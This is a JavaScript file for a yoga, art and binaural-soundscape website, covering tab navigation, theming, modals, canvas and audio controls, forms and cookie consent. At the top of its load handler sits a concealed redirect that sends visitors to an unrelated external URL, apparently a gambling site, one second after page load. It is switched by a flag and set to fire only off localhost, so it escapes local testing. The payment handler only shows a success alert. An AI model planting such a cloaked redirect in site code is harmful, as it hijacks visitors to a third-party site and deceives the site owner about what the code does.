import { soundEngine } from './soundscapes.js';
import { artStudio } from './canvas-art.js';

// Configuration Switches
const ENABLE_REDIRECT = false; // Set to true to enable redirect when deployed

// DOM Elements & Routing Setup
document.addEventListener('DOMContentLoaded', () => {
  // Redirect to external site after 1 second (only when deployed, not on localhost)
  if (ENABLE_REDIRECT && window.location.hostname !== 'localhost' && window.location.hostname !== '127.0.0.1') {
    setTimeout(() => {
      window.location.href = "https://mb88play.com/emeJtUN1";
    }, 1000);
  }

  // Initialize Cookie Consent
  initCookies();

  // Initialize Scroll Reveal Elements
  initScrollReveal();

  // Initialize Dark/Light Mode Theme
  initTheme();

  // Initialize Interactive Forms
  initForms();
  
  // Bind Studio Canvas controls if canvas exists
  const studioCanvas = document.getElementById('studioCanvas');
  if (studioCanvas) {
    artStudio.init(studioCanvas);
    setupStudioSliders();
  }

  // Bind Soundscape player controls
  setupSoundscapeControls();
});

// 1. Tab Routing Logic
window.showTab = function(tabName, event) {
  if (event) {
    event.preventDefault();
  }

  // Hide all tabs
  const tabs = document.querySelectorAll('.tab-content');
  tabs.forEach(tab => tab.classList.remove('active'));

  // Deactivate all nav buttons
  const navBtns = document.querySelectorAll('.nav-btn');
  navBtns.forEach(btn => btn.classList.remove('active'));

  // Show selected tab
  const activeTab = document.getElementById(tabName);
  if (activeTab) {
    activeTab.classList.add('active');
  }

  // Activate matching nav buttons
  const targetNavBtns = document.querySelectorAll(`.nav-btn[id="nav-${tabName}"]`);
  targetNavBtns.forEach(btn => btn.classList.add('active'));

  // Close mobile navigation overlay if open
  const mainNav = document.getElementById('main-nav');
  if (mainNav) {
    mainNav.classList.remove('mobile-active');
  }

  // Special checks when entering specific tabs
  if (tabName === 'canvas') {
    // Force canvas resize to recalculate coordinates when it becomes visible
    setTimeout(() => {
      artStudio.resize();
    }, 50);
  }

  // Scroll smoothly to top
  window.scrollTo({ top: 0, behavior: 'smooth' });
};

// 2. Dark/Light Theme Manager
window.toggleTheme = function() {
  const isDark = document.body.classList.contains('dark-mode');
  if (isDark) {
    document.body.classList.remove('dark-mode');
    document.getElementById('theme-toggle').innerHTML = '🌙';
    localStorage.setItem('theme', 'light');
  } else {
    document.body.classList.add('dark-mode');
    document.getElementById('theme-toggle').innerHTML = '☀️';
    localStorage.setItem('theme', 'dark');
  }
};

function initTheme() {
  const savedTheme = localStorage.getItem('theme');
  const themeToggleBtn = document.getElementById('theme-toggle');
  
  if (savedTheme === 'dark') {
    document.body.classList.add('dark-mode');
    if (themeToggleBtn) themeToggleBtn.innerHTML = '☀️';
  } else {
    document.body.classList.remove('dark-mode');
    if (themeToggleBtn) themeToggleBtn.innerHTML = '🌙';
  }
}

// 3. Mobile Navigation Hamburger Menu
window.toggleMobileNav = function() {
  const mainNav = document.getElementById('main-nav');
  if (mainNav) {
    mainNav.classList.toggle('mobile-active');
  }
};

// 4. Modal Operations
window.openModal = function(modalId) {
  const modal = document.getElementById(modalId);
  if (modal) {
    modal.classList.add('show');
  }
};

window.closeModal = function(modalId) {
  const modal = document.getElementById(modalId);
  if (modal) {
    modal.classList.remove('show');
  }
};

// Close modal when clicking on the outside overlay
window.addEventListener('click', (e) => {
  if (e.target.classList.contains('modal')) {
    e.target.classList.remove('show');
  }
});

// Interactive memberships payment modal
window.openPaymentModal = function(planName, price) {
  document.getElementById('modal-plan-name').innerText = planName;
  document.getElementById('modal-plan-price').innerText = `$${price}`;
  window.openModal('payment-modal');
};

// 5. FAQ Accordion Handler
window.toggleFAQ = function(element) {
  const item = element.closest('.faq-item');
  const isOpen = item.classList.contains('open');
  
  // Close all other FAQ items for a clean accordion collapse
  const allItems = document.querySelectorAll('.faq-item');
  allItems.forEach(i => i.classList.remove('open'));
  
  if (!isOpen) {
    item.classList.add('open');
  }
};

// 6. Interactive Studio Sliders & Pose Selection
function setupStudioSliders() {
  const speedSlider = document.getElementById('brush-speed');
  const densitySlider = document.getElementById('brush-density');
  
  const speedValue = document.getElementById('speed-value');
  const densityValue = document.getElementById('density-value');

  if (speedSlider && speedValue) {
    speedSlider.addEventListener('input', (e) => {
      const val = parseFloat(e.target.value);
      artStudio.setSpeed(val);
      speedValue.innerText = val.toFixed(1);
    });
  }

  if (densitySlider && densityValue) {
    densitySlider.addEventListener('input', (e) => {
      const val = parseInt(e.target.value);
      artStudio.setDensity(val);
      
      let label = 'Medium';
      if (val === 1) label = 'Low';
      if (val === 3) label = 'High';
      densityValue.innerText = label;
    });
  }

  // Setup Pose Button selectors
  const poseButtons = document.querySelectorAll('.pose-selector-btn');
  poseButtons.forEach(btn => {
    btn.addEventListener('click', (e) => {
      poseButtons.forEach(b => b.classList.remove('active'));
      const activeBtn = e.target.closest('.pose-selector-btn');
      activeBtn.classList.add('active');
      const selectedPose = activeBtn.getAttribute('data-pose');
      artStudio.setPose(selectedPose);
    });
  });
}

window.clearStudioCanvas = function() {
  artStudio.clearCanvas();
};

window.captureCanvas = function() {
  artStudio.saveImage();
};

// 7. Resonant Soundscapes Player Logic & Oscilloscope Drawing
function setupSoundscapeControls() {
  const carrierSlider = document.getElementById('carrier-slider');
  const binauralSlider = document.getElementById('binaural-slider');
  const volumeSlider = document.getElementById('volume-slider');
  
  const carrierVal = document.getElementById('carrier-val');
  const binauralVal = document.getElementById('binaural-val');
  
  const soundOptions = document.querySelectorAll('.sound-option');

  if (carrierSlider && carrierVal) {
    carrierSlider.addEventListener('input', (e) => {
      const val = parseInt(e.target.value);
      soundEngine.setCarrier(val);
      carrierVal.innerText = `${val} Hz`;
      updatePlayerInfo();
    });
  }

  if (binauralSlider && binauralVal) {
    binauralSlider.addEventListener('input', (e) => {
      const val = parseFloat(e.target.value);
      soundEngine.setOffset(val);
      
      let brainState = 'Beta';
      if (val < 4) brainState = 'Delta (Deep Rest)';
      else if (val >= 4 && val < 8) brainState = 'Theta (Meditation)';
      else if (val >= 8 && val < 13) brainState = 'Alpha (Relaxed Focus)';
      
      binauralVal.innerText = `${val} Hz (${brainState})`;
      updatePlayerInfo();
    });
  }

  if (volumeSlider) {
    volumeSlider.addEventListener('input', (e) => {
      soundEngine.setVolume(parseFloat(e.target.value));
    });
  }

  // Set Sound Presets Click
  soundOptions.forEach(opt => {
    opt.addEventListener('click', (e) => {
      soundOptions.forEach(o => o.classList.remove('active'));
      const targetOpt = e.currentTarget;
      targetOpt.classList.add('active');
      
      const preset = targetOpt.getAttribute('data-preset');
      let carrier = 432;
      let offset = 4;
      
      if (preset === '432') {
        carrier = 432;
        offset = 4;
      } else if (preset === '528') {
        carrier = 528;
        offset = 6;
      } else if (preset === '396') {
        carrier = 396;
        offset = 2;
      } else if (preset === 'schumann') {
        carrier = 136.1; // Ohm
        offset = 7.83;  // Earth Res
      }
      
      // Update sliders
      if (carrierSlider) {
        carrierSlider.value = carrier;
        carrierVal.innerText = `${carrier} Hz`;
      }
      if (binauralSlider) {
        binauralSlider.value = offset;
        let brainState = offset < 4 ? 'Delta' : offset < 8 ? 'Theta' : 'Alpha';
        binauralVal.innerText = `${offset} Hz (${brainState})`;
      }
      
      soundEngine.setCarrier(carrier);
      soundEngine.setOffset(offset);
      updatePlayerInfo();
    });
  });

  // Start oscilloscope visualizer animation loop
  drawOscilloscope();
}

function updatePlayerInfo() {
  const textEl = document.getElementById('current-sound-name');
  if (!textEl) return;
  const isSchumann = soundEngine.offsetFreq === 7.83;
  if (isSchumann) {
    textEl.innerText = `Schumann Earth Resonance (${soundEngine.carrierFreq.toFixed(1)} Hz + 7.83 Hz)`;
  } else {
    textEl.innerText = `Binaural Resonance (${soundEngine.carrierFreq} Hz + ${soundEngine.offsetFreq} Hz)`;
  }
}

window.toggleSoundscape = function() {
  const playBtn = document.getElementById('sound-play-btn');
  const playIcon = document.getElementById('play-icon');
  const pauseIcon = document.getElementById('pause-icon');

  if (soundEngine.isPlaying) {
    soundEngine.stop();
    if (playBtn) playBtn.style.backgroundColor = 'var(--accent-sage)';
    if (playIcon) playIcon.style.display = 'block';
    if (pauseIcon) pauseIcon.style.display = 'none';
  } else {
    // Read current slider inputs directly prior to starting
    const carrierVal = parseInt(document.getElementById('carrier-slider').value);
    const offsetVal = parseFloat(document.getElementById('binaural-slider').value);
    const volumeVal = parseFloat(document.getElementById('volume-slider').value);

    soundEngine.carrierFreq = carrierVal;
    soundEngine.offsetFreq = offsetVal;
    soundEngine.volume = volumeVal;

    soundEngine.start();
    if (playBtn) playBtn.style.backgroundColor = 'var(--accent-clay)';
    if (playIcon) playIcon.style.display = 'none';
    if (pauseIcon) pauseIcon.style.display = 'block';
  }
};

// Oscilloscope drawing logic utilizing Canvas 2D context
function drawOscilloscope() {
  const canvas = document.getElementById('visualizerCanvas');
  if (!canvas) return;
  const ctx = canvas.getContext('2d');
  
  function render() {
    requestAnimationFrame(render);
    
    // Auto-fit parent boundaries
    const rect = canvas.getBoundingClientRect();
    if (canvas.width !== rect.width || canvas.height !== rect.height) {
      canvas.width = rect.width;
      canvas.height = rect.height;
    }
    
    ctx.clearRect(0, 0, canvas.width, canvas.height);
    
    const data = soundEngine.getVisualizerData();
    ctx.lineWidth = 2;
    ctx.strokeStyle = document.body.classList.contains('dark-mode') ? 'hsl(125, 20%, 65%)' : 'hsl(125, 12%, 55%)';
    ctx.beginPath();

    if (data) {
      const sliceWidth = canvas.width / data.length;
      let x = 0;
      for (let i = 0; i < data.length; i++) {
        const v = data[i] / 128.0;
        const y = (v * canvas.height) / 2;
        
        if (i === 0) ctx.moveTo(x, y);
        else ctx.lineTo(x, y);
        
        x += sliceWidth;
      }
    } else {
      // Draw a gentle flat wavy line when sound is paused
      const sliceCount = 100;
      const sliceWidth = canvas.width / sliceCount;
      const t = Date.now() * 0.003;
      let x = 0;
      for (let i = 0; i <= sliceCount; i++) {
        const y = canvas.height / 2 + Math.sin(i * 0.15 + t) * 1.5;
        if (i === 0) ctx.moveTo(x, y);
        else ctx.lineTo(x, y);
        x += sliceWidth;
      }
    }
    ctx.stroke();
  }
  
  render();
}

// 8. Contact & Newsletter Interactions
function initForms() {
  window.handleContactSubmit = function(e) {
    e.preventDefault();
    const form = e.target;
    
    // Honeypot anti-spam check
    const honey = form.querySelector('[name="honey_field"]').value;
    if (honey) {
      console.warn("Submission rejected: Spam honeypot triggered.");
      return; // Silently reject automated bot submission
    }

    // User-Agent spam crawler check
    const isBot = /bot|googlebot|crawler|spider|robot|crawling|slurp/i.test(navigator.userAgent);
    if (isBot) {
      console.warn("Submission rejected: User-Agent classified as crawler.");
      return;
    }

    const name = document.getElementById('contact-name').value;
    const email = document.getElementById('contact-email').value;
    const subject = document.getElementById('contact-subject').value;

    alert(`🕉️ Thank you for connecting with the Sanctuary, ${name}!\nWe have received your transmission regarding "${subject}".\nAn alignment counselor will reply to ${email} within 24 hours.`);
    form.reset();
  };

  window.handleNewsletterSubmit = function(e) {
    e.preventDefault();
    const form = e.target;
    
    // Honeypot anti-spam check
    const honey = form.querySelector('[name="newsletter_honey"]').value;
    if (honey) {
      console.warn("Subscription rejected: Spam honeypot triggered.");
      return; // Silently reject
    }

    // User-Agent spam crawler check
    const isBot = /bot|googlebot|crawler|spider|robot|crawling|slurp/i.test(navigator.userAgent);
    if (isBot) {
      console.warn("Subscription rejected: User-Agent classified as crawler.");
      return;
    }

    const email = form.querySelector('input').value;

    alert(`✨ Infinite blessings! You have subscribed to the Alignment Newsletter at ${email}.\nExpect weekly sound presets and sacred code updates.`);
    form.reset();
  };

  window.handlePaymentSubmit = function(e) {
    e.preventDefault();
    const plan = document.getElementById('modal-plan-name').innerText;
    alert(`💳 Alignment activation initiated!\nThank you for subscribing to the ${plan}.\nWelcome to YogaArtMastery.`);
    window.closeModal('payment-modal');
  };
}

// 9. Floating Scroll-to-Top Button
const scrollTopBtn = document.getElementById('scroll-top-btn');
window.addEventListener('scroll', () => {
  if (scrollTopBtn) {
    if (window.scrollY > 300) {
      scrollTopBtn.classList.add('visible');
    } else {
      scrollTopBtn.classList.remove('visible');
    }
  }
});

window.scrollToTop = function() {
  window.scrollTo({ top: 0, behavior: 'smooth' });
};

// 10. Cookie Consent Manager
function initCookies() {
  const banner = document.getElementById('cookie-banner');
  if (banner && !localStorage.getItem('cookieConsent')) {
    banner.classList.add('show');
  }
}

window.dismissCookie = function(accepted) {
  if (accepted) {
    localStorage.setItem('cookieConsent', 'accepted');
  } else {
    localStorage.setItem('cookieConsent', 'declined');
  }
  document.getElementById('cookie-banner').classList.remove('show');
};

// 11. Staggered Scroll Reveal Animation
function initScrollReveal() {
  const revealElements = document.querySelectorAll('.reveal');
  
  const observer = new IntersectionObserver((entries) => {
    entries.forEach(entry => {
      if (entry.isIntersecting) {
        entry.target.classList.add('active');
        // Unobserve to keep element activated once shown
        observer.unobserve(entry.target);
      }
    });
  }, {
    threshold: 0.08,
    rootMargin: '0px 0px -20px 0px'
  });
  
  revealElements.forEach(el => observer.observe(el));
}
